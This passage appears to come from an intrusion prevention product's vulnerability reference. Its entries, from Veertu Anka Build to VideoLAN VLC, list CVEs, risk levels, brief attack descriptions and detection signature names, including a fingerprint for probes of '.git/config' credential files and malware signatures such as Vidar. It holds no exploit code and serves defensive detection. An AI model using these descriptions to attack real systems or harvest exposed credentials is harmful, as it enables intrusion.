About this vulnerability: A vulnerability in Veertu Anka Build
Risk: Moderate
First detected in: sgpkg-ips-1804-5242
Last changed: sgpkg-ips-1804-5242
Platform: Generic
Software: Veertu Anka Build
Type: Directory Traversal
Description: Improper validation of the service parameter used in the archive API endpoint causes a directory traversal vulnerability in Veertu Anka Build. A successful exploitation allows an attacker to read arbitrary files on the target system.
Situation: HTTP_CRL-Veertu-Anka-Build-Service-Directory-Traversal
References:
CVE-2024-41163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41163
Back to top

Vegadns-Axfr_Get-Command-Injection

About this vulnerability: A vulnerability in VegaDNS VegaDNS
Risk: Moderate
First detected in: sgpkg-ips-841-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VegaDNS
Type: Input Validation
Description: Improper handling of client-supplied parameters results in a command injection vulnerability in the axfr_get.php script of VegaDNS. A successful exploitation allows an attacker to run arbitrary commands on the target system.
Situation: HTTP_CRL-Vegadns-Axfr_Get-Command-Injection
Back to top

Veil-Evading-Binary

About this vulnerability: An executable file generated with Veil Evasion framework
Risk: High
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: A file with matching characteristics of Veil obfuscated exploit payloads.
Situation: File-Exe_Veil-Evading-Binary-1
File-Exe_Veil-Evading-Binary-3
File-Exe_Veil-Evading-Binary-2
File-Exe_Veil-Evading-Binary-4
Back to top

Vercel-Next.js-Improper-URL-Handling-Denial-of-Service

About this vulnerability: A vulnerability in the Next.js React framework.
Risk: High
First detected in: sgpkg-ips-1439-5242
Last changed: sgpkg-ips-1439-5242
Platform: Linux;Unix
Software: Vercel Next.js
Type: Malfunction
Description: A vulnerability in Vercel Next.js, versions 11.1.0 and above prior to 12.0.5, which allows remote attackers to create a denial of service condition by sending a request containing a maliciously crafted URL to a Next.js server, due to insufficient error handling when processing certain URLs.
Situation: HTTP_CS-Vercel-Next.js-Improper-URL-Handling-Denial-of-Service
References:
CVE-2021-43803
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43803
Back to top

Verisign-MPKI-ConfigChk-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Verisign MPKI
Risk: High
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Verisign MPKI
Type: Buffer Overflow
Description: There is a buffer overflow with a specific method of Verisign MPKI ConfigChk ActiveX control.
Situation: HTTP_SS-Verisign-MPKI-ConfigChk-ActiveX-Control-Buffer-Overflow
File-Text_Verisign-MPKI-ConfigChk-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-1083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1083
BID-22671
http://www.securityfocus.com/bid/22671
BID-22676
http://www.securityfocus.com/bid/22676
OSVDB-33479
http://www.osvdb.org/33479
Back to top

Veritas-Backup-Exec-Agent-Authentication-Bypass

About this vulnerability: Authentication bypass vulnerability in the Veritas Backup Exec Agent
Risk: High
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Veritas Software NetBackup
Type: Input Validation
Description: The Veritas Backup Exec Agent has an authentication-related vulnerability. The Agent has a hard coded password for the user 'root' when the MD5 authentication method is used. A remote attacker is able to use this known password to connect to Veritas Backup Exec Agents and download arbitrary files from the victim hosts.
Situation: Generic_Veritas-Backup-Exec-Agent-Authentication-Bypass
References:
CVE-2005-2611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2611
BID-14551
http://www.securityfocus.com/bid/14551
Back to top

Veritas-Backup-Exec-Agent-Browser-BOF

About this vulnerability: Buffer overflow vulnerability in Veritas Backup Exec
Risk: High
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Veritas Software NetBackup
Type: Buffer Overflow
Description: Veritas Backup Exec versions 8.x and 9.x are vulnerable to a stack-based buffer overflow caused by improper bounds checking by the Agent Browser service when handling incoming registration requests. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system.
Situation: Generic_Veritas-Backup-Exec-Agent-Browser-BOF
References:
CVE-2004-1172
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1172
BID-11974
http://www.securityfocus.com/bid/11974
OSVDB-12418
http://www.osvdb.org/12418
Back to top

Veritas-Backup-Exec-Agent-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Veritas Backup Exec Agent
Risk: High
First detected in: sgpkg-ips-31-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Veritas Software NetBackup
Type: Buffer Overflow
Description: Veritas Backup Exec Remote Agent has a buffer overflow vulnerability in the handling of authentication requests. A remote attacker can exploit this vulnerability to execute arbitrary code via a client authentication request (CONNECT_CLIENT_AUTH) with authentication method type 3 and a long password argument.
Situation: Generic_Veritas-Backup-Exec-Agent-Buffer-Overflow
References:
CVE-2005-0773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0773
BID-14022
http://www.securityfocus.com/bid/14022
OSVDB-17624
http://www.osvdb.org/17624
Back to top

Veritas-Backup-Exec-Agent-Command-Execution-Vulnerability-CVE-2021-27878

About this vulnerability: An attempt to exploit a vulnerability in Veritas Software NetBackup detected
Risk: High
First detected in: sgpkg-ips-1596-5242
Last changed: sgpkg-ips-1596-5242
Platform: Generic
Software: Veritas Software NetBackup
Type: Insecure Configuration
Description: An issue was discovered in Veritas Backup Exec before 21.2. The communication between a client and an Agent requires successful authentication, which is typically completed over a secure TLS communication. However, due to a vulnerability in the SHA Authentication scheme, an attacker is able to gain unauthorized access and complete the authentication process. Subsequently, the client can execute data management protocol commands on the authenticated connection. The attacker could use one of these commands to execute an arbitrary command on the system using system privileges.
Situation: Generic_CS-Veritas-Backup-Exec-Agent-Improper-Authentication-Vulnerability-CVE-2021-27877
References:
CVE-2021-27878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27878
Back to top

Veritas-Backup-Exec-Agent-Error-Status-Denial-Of-Service

About this vulnerability: A vulnerability in VERITAS Software BackUp Exec
Risk: Moderate
First detected in: sgpkg-ips-355-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Veritas Software BackUp Exec
Type: Null Pointer Dereference
Description: There exists a denial of service vulnerability in VERITAS Backup Exec Agent for Windows. The flaw is caused by improper handling of exceptional conditions raised by malformed request packets. A remote attacker could leverage this issue to cause a denial of service on a vulnerable machine.
Situation: Generic_CS-Veritas-Backup-Exec-Agent-Error-Status-Denial-Of-Service
References:
CVE-2005-0772
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0772
BID-14021
http://www.securityfocus.com/bid/14021
Back to top

Veritas-Backup-Exec-Agent-Improper-Authentication-Vulnerability-CVE-2021-27877

About this vulnerability: An attempt to exploit a vulnerability in Veritas Software NetBackup detected
Risk: High
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1580-5242
Platform: Generic
Software: Veritas Software NetBackup
Type: Insecure Configuration
Description: An issue was discovered in Veritas Backup Exec before 21.2. It supports multiple authentication schemes, and SHA authentication is one of them. This authentication scheme is no longer used in current versions of the product, but had not yet been disabled. An attacker could remotely exploit this scheme to gain unauthorized access to an Agent and execute privileged commands.
Situation: Generic_CS-Veritas-Backup-Exec-Agent-Improper-Authentication-Vulnerability-CVE-2021-27877
References:
CVE-2021-27877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27877
Back to top

Veritas-Backup-Exec-Agent-Improper-File-Access-Vulnerability-CVE-2021-27876

About this vulnerability: An attempt to exploit a vulnerability in Veritas Software NetBackup detected
Risk: High
First detected in: sgpkg-ips-1596-5242
Last changed: sgpkg-ips-1596-5242
Platform: Generic
Software: Veritas Software NetBackup
Type: Insecure Configuration
Description: An issue was discovered in Veritas Backup Exec before 21.2. The communication between a client and an Agent requires successful authentication, which is typically completed over a secure TLS communication. However, due to a vulnerability in the SHA Authentication scheme, an attacker is able to gain unauthorized access and complete the authentication process. Subsequently, the client can execute data management protocol commands on the authenticated connection. By using crafted input parameters in one of these commands, an attacker can access an arbitrary file on the system using System privileges.
Situation: Generic_CS-Veritas-Backup-Exec-Agent-Improper-Authentication-Vulnerability-CVE-2021-27877
References:
CVE-2021-27876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27876
Back to top

Veritas-Backup-Exec-Server-Remote-Registry-Access

About this vulnerability: Security bypass vulnerability in VERITAS Backup Exec for Windows
Risk: Moderate
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Veritas Software BackUp Exec
Type: Malfunction
Description: There is a security bypass vulnerability in VERITAS Backup Exec for Windows. A successful exploit leads to an unauthorized administrative access to the Windows registry on the target system.
Situation: MSRPC-TCP_CPS-Veritas-Backup-Exec-Server-Anonymous-Registry-Access
Generic_Veritas-Backup-Exec-Server-Anonymous-Registry-Access
References:
CVE-2005-0771
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0771
BID-14020
http://www.securityfocus.com/bid/14020
OSVDB-17627
http://www.osvdb.org/17627
Back to top

Veritas-NetBackup-Java-Authentication-Service-Compromise

About this vulnerability: Format string vulnerability in Veritas NetBackup
Risk: High
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Veritas Software NetBackup
Type: Format String
Description: Veritas NetBackup Authentication Service has a format strings vulnerability in the bpjava-msvc daemon. A remote attacker can connect to the server and issue a COMMAND_LOGON_TO_MSERVER command with format string specifiers in the supplied user name to exploit the flaw. A successful attack can result in arbitrary code execution with system privileges. Both the server and the client software are vulnerable and accept connections to the port 13722/tcp.
Situation: Generic_Veritas-NetBackup-Java-Authentication-Service-Compromise
References:
CVE-2005-2715
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2715
BID-15079
http://www.securityfocus.com/bid/15079
Back to top

Veritas-NetBackup-Remote-Command-Execution

About this vulnerability: A Veritas NetBackup Remote Command Execution vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Veritas Software NetBackup
Type: Input Validation
Description: A vulnerability in multiple versions of Veritas Software NetBackup which allows remote attackers to execute arbitrary commands via the bpjava-susvc process.
Situation: Generic_CS-Veritas-NetBackup-Remote-Command-Execution
References:
CVE-2004-1389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1389
BID-11494
http://www.securityfocus.com/bid/11494
OSVDB-11026
http://www.osvdb.org/11026
Back to top

Veritas-NetBackup-Vnetd-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Veritas NetBackup vnetd process
Risk: High
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Veritas Software NetBackup
Type: Buffer Overflow
Description: The vnetd process in Veritas NetBackup software has a buffer overflow vulnerability. The process fails to validate the length of arguments sent to it. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim machine.
Situation: Generic_Veritas-NetBackup-Vnetd-Buffer-Overflow
References:
CVE-2006-0991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0991
BID-17264
http://www.securityfocus.com/bid/17264
Back to top

Veritas-NetBackup-Volume-Manager-Daemon-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in VERITAS NetBackup Server volume manager daemon
Risk: High
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Veritas Software NetBackup
Type: Buffer Overflow
Description: VERITAS NetBackup has a buffer overflow vulnerability in the volume manager daemon. A specially crafted request to the daemon will result in a buffer overflow and allow unauthenticated remote attackers to execute arbitrary code with root/system privileges on a vulnerable host.
Situation: Generic_CS-Veritas-NetBackup-Volume-Manager-Daemon-Buffer-Overflow-2
Generic_CS-Veritas-NetBackup-Volume-Manager-Daemon-Buffer-Overflow
References:
CVE-2005-3116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3116
BID-15353
http://www.securityfocus.com/bid/15353
OSVDB-20674
http://www.osvdb.org/20674
Back to top

Versa-Director-Favicon-Unrestricted-File-Upload-CVE-2024-39717

About this vulnerability: An attempt to exploit a vulnerability in Versa Director detected
Risk: High
First detected in: sgpkg-ips-1821-5242
Last changed: sgpkg-ips-1821-5242
Platform: Generic
Software: Versa Director
Type: Input Validation
Description: The Versa Director GUI provides an option to customize the look and feel of the user interface. This option is only available for a user logged with "Provider-Data-Center-Admin" or "Provider-Data-Center-System-Admin" permissions. The "Change Favicon" option can be misused to upload a malicious file ending with ".png" extension to masquerade as an image file.
Situation: File-Zip_Suspicious-JAR-File-With-Image-Extension
References:
CVE-2024-39717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39717
Back to top

VersalSoft-HTTP-File-Upload-ActiveX-Control-AddFile-Method-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in VersalSoft HTTP Upload ActiveX control
Risk: Moderate
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1555-5242
Platform: Windows
Software: VersalSoft HTTP File Upload
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the VersalSoft HTTP File Upload ActiveX control. The vulnerability is due to a lack of input validation while processing user-supplied parameters for the ActiveX control.
Situation: HTTP_SS-VersalSoft-HTTP-File-Upload-ActiveX-Control-AddFile-Method-BOF
References:
CVE-2007-2563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2563
BID-23853
http://www.securityfocus.com/bid/23853
OSVDB-34339
http://www.osvdb.org/34339
Back to top

Version-Control-Metafile-Access

About this vulnerability: An attempt to access a configuration/environment file detected
Risk: High
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Platform: Generic
Software: Any Software
Type: Insecure Configuration
Description: This fingerprint detects attempts to access common version control systems' metafiles (e.g., ".git/config"). These files may contain user credentials, and if misconfigured, they could be exposed to the Internet.
Situation: HTTP_CSU-Version-Control-Configuration-Access
Back to top

Verso-NetPerformer-Telnet-Buffer-Overflow-Vulnerability

About this vulnerability: A vulnerability in Verso NetPerformer
Risk: Low
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Verso NetPerformer
Type: Insecure Configuration
Description: There is a buffer overflow in the telnet service in Verso NetPerformer FRAD ACT SDM-95xx 7.xx (R1) and earlier, SDM-93xx 10.x.x (R2) and earlier, and SDM-92xx 9.x.x (R1) and earlier allows remote attackers to cause a denial of service (reboot) and possibly execute arbitrary code via a long username.
Situation: Telnet_CS-Verso-NetPerformer-Telnet-Buffer-Overflow-Vulnerability
References:
CVE-2006-4832
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4832
BID-19989
http://www.securityfocus.com/bid/19989
Back to top

Vertexnet-Bot

About this vulnerability: VertexNet Bot
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: VertexNet is a Botnet that is used for various malicious purposes.
Situation: HTTP_CSU-Vertexnet-Bot-Activity
Back to top

Very-Large-XML-File

About this vulnerability: A very large XML file was detected
Risk: Moderate
First detected in: sgpkg-ips-502-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: A very large XML file was detected
Situation: File-TextId_Very-Large-XML-File
Back to top

VeryPDF-PDFView-Heap-Overflow

About this vulnerability: A VeryPDF PDFView Heap Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: VeryPDF PDFView
Type: Buffer Overflow
Description: A buffer overflow vulnerability in VeryPDF PDFView, version 2.0.0.1, in the PDFVIEW.PdfviewCtrl.1 ActiveX control in pdfview.ocx, which allows remote attackers to execute arbitrary code via a long first argument to the OpenPDF method.
Situation: File-Text_VeryPDF-PDFView-Heap-Overflow
References:
CVE-2008-5492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5492
BID-32313
http://www.securityfocus.com/bid/32313
OSVDB-49871
http://www.osvdb.org/49871
Back to top

VHD-PTZ-Camera-Firmware-Authentication-Bypass-CVE-2024-8956

About this vulnerability: A vulnerability in VHD PTZ camera firmware
Risk: High
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1796-5242
Platform: Generic
Software: VHD PTZ
Type: Input Validation
Description: Insufficient authentication in the VHD PTZ camera firmware versions prior to 6.3.40 allows a remote attacker to bypass the authentication requirements for various cgi scripts. This vulnerability affects PTZOptics cameras, Multicam Systems SAS cameras, and SMTAV Corporation IP cameras based on Hisilicon Hi3516A V600.
Situation: HTTP_CS-VHD-PTZ-Camera-Firmware-Authentication-Bypass-CVE-2024-8956
References:
CVE-2024-8956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8956
Back to top

VHD-PTZ-Camera-Firmware-Command-Injection-CVE-2024-8957

About this vulnerability: A vulnerability in VHD PTZ
Risk: High
First detected in: sgpkg-ips-1796-5242
Last changed: sgpkg-ips-1796-5242
Platform: Generic
Software: VHD PTZ
Type: Input Validation
Description: A command injection vulnerability in the VHD PTZ camera firmware versions prior to 6.3.40 allows a remote attacker to execute arbitrary OS commands via crafted HTTP requests. This vulnerability affects PTZOptics cameras, Multicam Systems SAS cameras, and SMTAV Corporation IP cameras based on Hisilicon Hi3516A V600. If chained together with CVE-2024-8956, the authentication requirement for exploiting this vulnerability can be bypassed.
Situation: HTTP_CRL-VHD-PTZ-Camera-Firmware-Command-Injection-CVE-2024-8957
References:
CVE-2024-8957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8957
Back to top

Viber-URI-Handler-Remote-Code-Execution

About this vulnerability: A vulnerability in Viber
Risk: High
First detected in: sgpkg-ips-1177-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Viber
Type: Input Validation
Description: A vulnerability in Viber, versions 10.5.0.23 and before, which allows a remote attacker to execute arbitrary code by enticing a user to open a malicious web page, due to improper sanitization of the user supplied data.
Situation: File-Text_Viber-URI-Handler-Remote-Code-Execution
File-TextId_Viber-URI-Handler-Remote-Code-Execution
References:
CVE-2019-12569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12569
Back to top

VICIDIAL-Authenticated-Remote-Code-Execution

About this vulnerability: A vulnerability in VICIdial
Risk: High
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Platform: Unix; Linux
Software: VICIDIAL
Type: Input Validation
Description: A vulnerability in VICIdial, version 2.14-917a, which allows remote users authenticated as "agent" to execute arbitrary shell commands through multiple user controlled request parameters.
Situation: HTTP_CRL-VICIDIAL-Authenticated-Remote-Code-Execution
References:
CVE-2024-8504
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8504
Back to top

VICIDIAL-Dialer-SQL-And-Command-Injection

About this vulnerability: A VICIDIAL Dialer SQL And Command Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VICIDIAL
Type: Input Validation
Description: A vulnerability in VICIDIAL Dialer, versions 2.8-403a, 2.7, 2.7RC1, and earlier, which allows remote attckers to perform SQL and command injections via the campaign variable in SCRIPT_multirecording_AJAX.php, the server_ip parameter in manager_send.php, and extension parameter in manager_send.php. This covers CVE-2013-4467 and CVE-2013-4468.
Situation: HTTP_CRL_VICIDIAL-Dialer-SQL-And-Command-Injection
References:
CVE-2013-4467
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4467
BID-63340
http://www.securityfocus.com/bid/63340
OSVDB-98903
http://www.osvdb.org/98903
Back to top

VICIDIAL-Multiple-Authenticated-SQLi

About this vulnerability: A vulnerability in VICIdial.
Risk: High
First detected in: sgpkg-ips-1507-5242
Last changed: sgpkg-ips-1507-5242
Platform: Generic
Software: VICIDIAL
Type: Input Validation
Description: A vulnerability in VICIdial, versions 2.14b0.5 prior to svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable), which allows remote attackers to gain sensitive information via SQL injection to multiple parameters. CVE-2022-34876, CVE-2022-34877, and CVE-2022-34878.
Situation: HTTP_CS-VICIDIAL-Multiple-Authenticated-SQLi
References:
CVE-2022-34876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34876
Back to top

Victory-FTP-Server-Denial-Of-Service

About this vulnerability: A Victory FTP Server Denial Of Service vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Victory FTP
Type: Null Pointer Dereference
Description: A vulnerability in Victory FTP, version 5.0, which allows remote attackers to cause a denial of service condition via a LIST command followed by a forward slash backslash "/\". This also covers CVE-2008-2031.
Situation: FTP_CS-Victory-FTP-Server-Denial-Of-Service
References:
CVE-2008-6829
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6829
OSVDB-44608
http://www.osvdb.org/44608
Back to top

Vidar-Malware-Infection-Traffic

About this vulnerability: Vidar Backdoor malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1321-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Vidar Infostealer malware infection traffic was detected.
Situation: HTTP_CS-Vidar-Malware-Infection-Traffic
Back to top

VideoLAN-Client-Media-Player-Crafted-M3u-Format-String-Buffer-Overflow

About this vulnerability: A vulnerability in VideoLAN VLC
Risk: Moderate
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Directory Traversal
Description: There is a format-string vulnerability in VideoLAN VLC media player.
Situation: File-TextId_VideoLAN-Client-Media-Player-Crafted-M3u-Format-String-Buffer-Overflow
References:
CVE-2007-0017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0017
BID-21852
http://www.securityfocus.com/bid/21852
OSVDB-31163
http://www.osvdb.org/31163
Back to top

VideoLAN-VLC-ActiveX-Control-Crafted-Parameter-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in VideoLAN VLC
Risk: High
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: VideoLAN VLC
Type: Malfunction
Description: There is a memory corruption vulnerability in VideoLAN VLC media player ActiveX control. The flaw is due to recursive object release. A remote attacker may exploit this vulnerability by enticing the target user to visit a malicious web site. Successful attack may allow for arbitrary code being injected and executed with the privileges of the currently logged on user.
Situation: HTTP_SS-VideoLAN-VLC-ActiveX-Control-Crafted-Parameter-Memory-Corruption
File-Text_VideoLAN-VLC-ActiveX-Control-Crafted-Parameter-Memory-Corruption
References:
CVE-2007-6262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6262
BID-26675
http://www.securityfocus.com/bid/26675
Back to top

VideoLAN-VLC-AMV-Code-Execution

About this vulnerability: A VideoLAN VLC AMV Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-745-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: VideoLAN VLC
Type: Input Validation
Description: A vulnerability in VideoLAN VLC, versions before 1.1.8, which allows remote attackers to execute arbitrary code via a crafted width in an AMV file.
Situation: File-Text_VideoLAN-VLC-AMV-Code-Execution
References:
CVE-2010-3275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3275
OSVDB-71277
http://www.osvdb.org/71277
Back to top

VideoLAN-VLC-Media-Player-Realtext-File-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in VideoLAN VLC Media Player
Risk: High
First detected in: sgpkg-ips-187-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in VideoLAN VLC Media Player. The vulnerability is caused by a buffer overflow when playing a specially crafted RealText (.rt) subtitle file. An unauthenticated remote attacker could exploit this vulnerability by enticing a user to play a specially crafted RealText subtitle file. Successful exploitation would cause a stack buffer overflow allowing the attacker to execute arbitrary code with the privileges of the logged in users.
Situation: HTTP_SS-VideoLAN-VLC-Media-Player-Realtext-File-Buffer-Overflow
File-TextId_VideoLAN-VLC-Media-Player-Realtext-File-Buffer-Overflow
References:
CVE-2008-5036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5036
BID-32125
http://www.securityfocus.com/bid/32125
Back to top

VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-Buffer-Overflow

About this vulnerability: A vulnerability in VideoLAN VLC
Risk: Low
First detected in: sgpkg-ips-229-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: VideoLAN VLC
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in VideoLAN VLC Media Player. The vulnerability is due to a boundary error in "Win32AddConnection()" the function in the "modules/access/smb.c" file while parsing specially-crafted SMB paths. Remote attackers can exploit this vulnerability, for example, by enticing target users to open a playlist file with an overly long "smb://" URI, which causes a stack buffer overflow, or by sending a specially-crafted request to the VLC web interface. In an attack case where code injection is successful, the behavior of the target depends on the intended function of the injected code. The code is executed in the security context of the logged in user. In an attack case where code injection is not successful, the affected application terminates abnormally.
Situation: HTTP_CSU-VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-Buffer-Overflow
HTTP_SS-VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-Buffer-Overflow
File-TextId_VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-BOF
Back to top

VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free-Vulnerability

About this vulnerability: A vulnerability in VideoLAN VLC Media Player
Risk: High
First detected in: sgpkg-ips-274-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Malfunction
Description: There is a memory corruption vulnerability in VideoLAN VLC media player. The vulnerability is due to an invalid free error when processing SMB URIs. Remote attackers may exploit this vulnerability by enticing target users to open a maliciously crafted playlist file, such as a XSPF file, in a vulnerable version of VideoLAN VLC media player.
Situation: HTTP_CRL-VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free
HTTP_SS-VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free
File-TextId_VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free
Back to top

VideoLAN-VLC-Media-Player-Subtitle-Striptags-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in VideoLAN VLC Media Player
Risk: High
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Buffer Overflow
Description: A code execution vulnerability exists in VLC Media Player.
Situation: HTTP_SS-VideoLAN-VLC-Media-Player-Subtitle-Striptags-Heap-Buffer-Overflow
File-Binary_VideoLAN-VLC-Media-Player-Subtitle-Striptags-Heap-Buffer-Overflow
File-Binary_Invalid-Content-Type-For-VideoLAN-VLC-Media-Player
References:
CVE-2011-0522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0522
BID-46008
http://www.securityfocus.com/bid/46008
Back to top

VideoLAN-VLC-Media-Player-WAV-Processing-Integer-Overflow

About this vulnerability: A vulnerability in VideoLAN VLC Media Player
Risk: Low
First detected in: sgpkg-ips-229-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Integer Overflow
Description: There is a vulnerability in VideoLAN VLC Media Player. The vulnerability is due to an integer overflow during the calculation of the size of a heap buffer. An unauthenticated remote attacker can exploit this vulnerability by enticing a user to play a specially-crafted Wave/WAV file. Successful exploitation causes a heap buffer overflow, allowing the attacker to execute arbitrary code on the vulnerable system.
Situation: HTTP_SS-VideoLAN-VLC-Media-Player-WAV-Processing-Integer-Overflow
File-RIFF_VideoLAN-VLC-Media-Player-WAV-Processing-Integer-Overflow
References:
CVE-2008-2430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2430
BID-30058
http://www.securityfocus.com/bid/30058
Back to top

VideoLAN-VLC-Renamed-Zip-File-Handling-Code-Execution

About this vulnerability: A vulnerability in VideoLAN VLC Media Player
Risk: Moderate
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Malfunction
Description: There exists a memory corruption vulnerability in VLC Media Player.
Situation: File-Zip_Conflicting-Content-Type-AVI
References:
BID-40428
http://www.securityfocus.com/bid/40428
Back to top

VideoLAN-VLC-Ty-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in VideoLAN VLC
Risk: High
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in VideoLAN VLC. The vulnerability is due to a buffer overflow when opening TiVo TY media files. An unauthenticated remote attacker could exploit this vulnerability by enticing a user to play a specially crafted TiVo TY media file. Successful exploitation would cause a stack buffer overflow allowing the attacker to execute arbitrary code with the privileges of the logged in user.
Situation: HTTP_SS-VideoLAN-VLC-Ty-Processing-Buffer-Overflow
File-Binary_VideoLAN-VLC-Ty-Processing-Buffer-Overflow
References:
CVE-2008-4654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4654
BID-31813
http://www.securityfocus.com/bid/31813
Back to top

VideoLAN-VLC-XSPF-Memory-Corruption

About this vulnerability: A vulnerability in VideoLAN Project VLC Media Player
Risk: High
First detected in: sgpkg-ips-234-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VideoLAN VLC
Type: Malfunction
